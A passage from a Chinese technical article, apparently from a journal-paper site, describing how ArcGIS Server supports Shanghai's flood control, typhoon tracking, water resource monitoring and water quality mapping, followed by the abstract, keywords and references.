1)台风数据抓取:通过台风数据实时采集程序,从中国中央气象台、上海市气象局等相关网站上精确提取数据,将网页上的二维表导入数据库和XML格式数据解析,并提供手动校正功能。做到每6 h更新,当台风进入48 h警戒线后每3 h更新,台风进入24 h警戒线后每小时更新。

2)台风路径自动生成:利用InfoWindow动态绘制台风实况和预报路径,按照6个等级(热带低压、热带风暴、强热带风暴、台风、强台风、超强台风),通过不同颜色和大小的符号来直观表达台风发生、发展和消亡的变化过程。

3)多类服务叠加:将实时接收的卫星和雷达云图等,以GIS Server方式即时发布,并与Google,ESRI及微软等地图网络资源熔享,实现台风路径与多类资源的相互参考,为防汛指挥人员提供更为全面的决策支持。台风路径与卫星和雷达云图、Google Map叠加应用如图3所示。

5.1.2 灾情发布

通过ArcGIS Server将实时雨情、水务热线接报灾情、堤防险工险段、病险水闸、人员撤离点、撤离路线、安置点等信息,与市区暴雨积水、沿海区域风暴潮淹水、黄浦江沿线堤防溃决风险等专业模型生成的风险模拟图层集成在1张地图上,通过空间分析为防汛指挥及调度提供及时、全面的信息参考,提高抢险的效率及可操作性。

5.2 水资源管理应用

5.2.1 基础管理

对上海市区域内整个水循环过程中涉及的基础和设施数据进行统一管理和集成应用,包括河道水系(河流、湖泊等)、取水(地下水深井、取水口等)、供水(水厂、泵站等)、用水(用水情况日报、月报、节水指标等)、排水(排水系统和泵站、排水井、污染源、污水处理厂等)、资源保护(水功能区、水源地等)、水利工程(水利分片、重要水闸、圩区等)、河道整治(黑臭河道等)。并与上海市测绘院的基础地图服务、上海市排水处的专题数据服务进行熔享,借助于高分辨率的航空遥感数据为水资源管理提供客观参考。其中排水设施与市测绘院航空遥感数据叠加应用如图4所示。

5.2.2 监测监控

将监测站点采集到的长江和黄浦江2大原水系统的实时监测信息(包括长江原水的氯化物浓度,原水厂流量、压力等信息,黄浦江原水的潮位、氨氮、浊度、溶解氧、流量等信息)、全市市属供水水厂、泵站、管网的每5 min实时监测信息(包括供水水厂的出厂压力、瞬时流量、累计水量、出厂浊度、出厂余氯信息,供水泵站出站和供水管网等的压力信息)在基础地图上及时直观展示。

5.2.3 统计评价

在地图上对任意时间段内全市雨量等值线(面)即时绘制,直观展示全市雨量分布;以每月监测数据为基础,按水质级别以不同颜色在地图上直观反映骨干河道的水质情况;以每月监测数据为基础,按照水功能区划定义的水质控制标准直观反映各河段水质是否达到控制标准等。其中骨干河道水质评价应用如图5所示。

5.3 专题应用

将局部区域内的防汛保安、水资源管理及特定业务等应用的业务模块进行整合,形成面向局部区域的苏州河、世博园和区县等多个专题应用。如苏州河专题综合了苏州河区域内防汛保安、水资源管理的业务模块,同时拥有堤防巡查和网格化管理等特定模块,通过GIS技术实现日常巡检过程的数字化,为苏州河管理部门提供既面向对象又面向过程的信息汇总。

6 结语

ArcGIS Server技术的应用,改变了过去以纸质地图、文档为主的传统工作模式,提高了工作效率;同时通过资源熔享、数据整合和应用集成,使分布于不同区域、相互封闭的信息资源有机关联起来,深化了行业管理的精细化和数字化程度,初步实现了跨区域、行业的多部门间的工作协同,减少了重复劳动,降低了建设和运维成本。

下一步将继续探索ArcGIS Server的空间分析功能,并结合数据挖掘技术对多类实时监测监控数据进行综合分析提炼,构筑专题数据仓库,为上海市防汛保安、水资源管理等专题应用提供全方位的决策支持。

摘要:水务一体化管理涉及“水安全、水资源、水环境”,对信息整合共享,有效支撑基础管理和公共服务提出了新的需求。应用ArcGIS Server创建在线GIS Server,利用地图配置,地理信息服务瓦片制作、发布、应用等技术,实现了上海市水利、供水、排水等行业部门的专题数据,与Google Map,AOS等网络共享资源在“一张地图”上的汇聚融享及集成应用。通过在防汛保安、水资源管理和区域专题等方面的集约化应用实践,提高了综合服务水平,降低了建设和运维成本。

关键词:网络,地理信息服务,水务,综合管理

参考文献

[1]水利部信息化工作领导小组办公室.2008年度中国水利信息化发展报告[M].北京:中国水利水电出版社,2009:5-7.

[2]刘梅,章艳锋.信息化对北京水务公共管理和综合决策的影响研究[J].水文,2008,28(增刊):51-52.

[3]张闻波.水利信息资源整合的必然性与面临的问题[J].水文,2008,28(增刊):35-37.

[4]林先成,杨武年.WebGIS在防汛指挥决策支持信息系统中的应用[J].人民黄河,2008,30(3):15-16.

上一篇:作文教改下一篇:建构高效的语文课堂